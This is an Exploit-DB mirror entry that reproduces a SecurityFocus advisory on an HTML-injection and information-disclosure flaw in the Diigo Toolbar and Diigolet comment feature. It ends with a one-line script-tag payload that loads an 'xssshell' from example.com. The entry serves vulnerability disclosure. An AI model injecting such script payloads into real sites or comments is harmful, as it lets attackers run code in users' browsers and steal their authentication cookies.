exploit-db-mirror/exploits/multiple/remote/31890.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

9 lines
No EOL
710 B
Text

source: https://www.securityfocus.com/bid/29611/info
Diigo Toolbar and Diigolet are prone to an HTML-injection vulnerability and an information-disclosure vulnerability when handling data via the 'comment' feature.
An attacker can exploit the HTML-injection issue to run arbitrary HTML and script code in the plugin of an unsuspecting user in the context of the domain on which a shared comment was made. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The attacker can exploit the information-disclosure issue via successful man-in-the-middle attacks. Information harvested may aid in further attacks.
<script src="http://example.com/xssshell/"></script>